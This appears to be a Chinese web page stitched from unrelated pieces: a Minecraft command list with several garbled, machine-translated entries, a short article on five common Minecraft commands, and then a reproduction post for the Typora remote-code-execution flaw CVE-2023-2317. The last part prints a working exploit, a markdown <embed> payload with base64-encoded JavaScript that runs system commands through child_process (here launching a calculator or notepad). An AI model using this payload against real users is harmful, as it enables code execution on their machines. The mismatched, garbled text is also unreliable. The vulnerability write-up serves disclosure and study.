我的世界指令

/gamemode 0 生存

/gamemode 1 创建

/gamemode 2 冒险

/gamemode 3 spectate（旧版本无法使用）

/gamerule keepInventory 真死不掉命令

/difficulty 0、1、2、3 分别是和平、容易、正常、困难

/give player name item id item numbers give player item

/天气下雨

/weather clear 没有天气

/天雷

/杀死自杀

/spawnpoint 设置出生点

/effect clear 移除身体的所有效果

/clear 清除背包中的所有物品

/记分牌记分牌

/advancement 改变玩家进度

, /bossbar 改变boss血条

, /clear 清除玩家物品

, /clone 复制块，

/data 改变方块或实体的 NBT 数据，

/datapack 管理数据包，

/debug 开始调试，

/defaultgamemode 更改默认游戏模式

/difficulty 设置难度，

/effect 添加或移除药水效果，

/enchant 附魔玩家物品，

/execute 作为另一个实体执行命令，

/体验刷机体验，

/fill 填充正方形，

/function 运行函数，

/gamemode 改变游戏模式，

/gamerule 改变游戏规则，

/give 给玩家物品，

/help 显示帮助，

/kill 杀死实体，

/locate 定位最近的建筑坐标，

/me（不知道怎么形容），

/particle 产生粒子效果，

/playsound 播放音乐，

/recipe 管理组成，

/reload 重新加载数据包，

/replaceitem 替换物品

/说说话，

/记分牌记分牌，

/seed 显示种子，

/setblock 放置方块，

/setworldspawn 设置出生点

/spawnpoint 设置生成点，

/summon 生成实体

《我的世界》玩家最常用的5个指令是什么 学会以后你也是大神

《我的世界》是一款拥有超高自由度的沙盒游戏，玩家可以在庞大的方块世界中任意探索与创造。指令是游戏中一种非常神奇的代码，玩家只要在聊天框中输入正确的指令，就可以做到很多正常情况下无法完成的事。能否熟练运用指令也是检测你是否是老玩家的重要标准之一。今天，我们就来盘点一下老玩家们常用的5个指令，学会以后萌新也可以呼风唤雨。

修改模式

《我的世界》拥有四种不同的游戏模式：生存、创造、旁观、冒险。使用/gamemode指令即可在这四种模式中任意切换。

有趣的是当你使用旁观者模式时，还可以附身到各种生物身上，以它们的视角来观察整个世界。嗯，苦力怕的视角原来是这样的啊。

修改天气

在游戏中使用/weather指令即可任意修改当前天气，让玩家拥有能够呼风唤雨的能力。想随时都能使用三叉戟飞在空中，那就快将天气调成雨天吧。

定位建筑坐标

想要找村庄却不想跑路？那就快试试/locate指令吧，它可以帮你找到各种各样的建筑。村庄、冰屋、神殿还不是轻轻松松就能探索？

传送

要问游戏中移动速度最快的办法是什么，那一定非传送指令莫属了。只要使用/tp，你就可以瞬间传送到游戏中的任何地方。这个指令搭配/locate定位简直不要太好用。

召唤

/summon是一个异常强大的指令，它可以召唤出各种生物或物品道具。如果你对指令非常熟悉，甚至还可以召唤出很多正常游戏中不存在的东西，例如，彩虹狼、带手的盔甲架等等。

你还想知道关于指令的什么知识呢？欢迎在评论区留言。

【漏洞复现】Typora 远程代码执行漏洞(CVE-2023-2317)

Typora是一款极简风格的Markdown编辑器，支持Windows、Mac和Linux三大操作系统平台，自2015年问世以来便凭借其优秀的性能和卓越的用户体验赢得了众多用户的青睐。与传统的分栏式Markdown编辑器不同，Typora采用了所见即所得（WYSIWYG）的设计理念，让用户在编辑过程中实时预览排版效果，极大提升了工作效率。

影响范围typora1.6.7之前版本

Windows和Linux版本1.6.7之前的Typora中的updater/update.html中存在基于DOM的XSS，该漏洞允许通过加载特制的markdown文件从而使得执行任意JavaScript代码。如果用户打开恶意markdown文件或者从恶意网页复制文本并将其粘贴到Typora，通过在＜embed＞标签中引用update.html，则可以利用此漏洞，此外，攻击者可以使用特权接口reqnode访问节点模块child_process并执行任意系统命令。

漏洞复现

<embed style="height:0;" src="typora://app/typemark/updater/updater.html?curVersion=111&newVersion=222&releaseNoteLink=333&hideAutoUpdates=false&labels=[%22%22,%22%3csvg%2fonload=top.eval(atob('cmVxbm9kZSgnY2hpbGRfcHJvY2VzcycpLmV4ZWMoKHtXaW4zMjogJ2NhbGMnLCBMaW51eDogJ2dub21lLWNhbGN1bGF0b3IgLWUgIlR5cG9yYSBSQ0UgUG9DIid9KVtuYXZpZ2F0b3IucGxhdGZvcm0uc3Vic3RyKDAsNSldKQ=='))><%2fsvg>%22,%22%22,%22%22,%22%22,%22%22]">```reqnode('child_process').exec(({Win32: 'calc', Linux: 'gnome-calculator -e "Typora RCE PoC"'})[navigator.platform.substr(0,5)])```<embed style="height:0;" src="typora://app/typemark/updater/updater.html?curVersion=111&newVersion=222&releaseNoteLink=333&hideAutoUpdates=false&labels=[%22%22,%22%3csvg%2fonload=top.eval(atob('cmVxbm9kZSgnY2hpbGRfcHJvY2VzcycpLmV4ZWMoKHtXaW4zMjogJ25vdGVwYWQgd3d3LmV4cHBvYy5vcmcnLCBMaW51eDogJ2dub21lLWNhbGN1bGF0b3IgLWUgIlR5cG9yYSBSQ0UgUG9DIid9KVtuYXZpZ2F0b3IucGxhdGZvcm0uc3Vic3RyKDAsNSldKQ=='))><%2fsvg>%22,%22%22,%22%22,%22%22,%22%22]">```reqnode('child_process').exec(({Win32: 'notepad www.exppoc', Linux: 'gnome-calculator -e "Typora RCE PoC"'})[navigator.platform.substr(0,5)])```

#网络安全##安全漏洞##头条文章发文任务##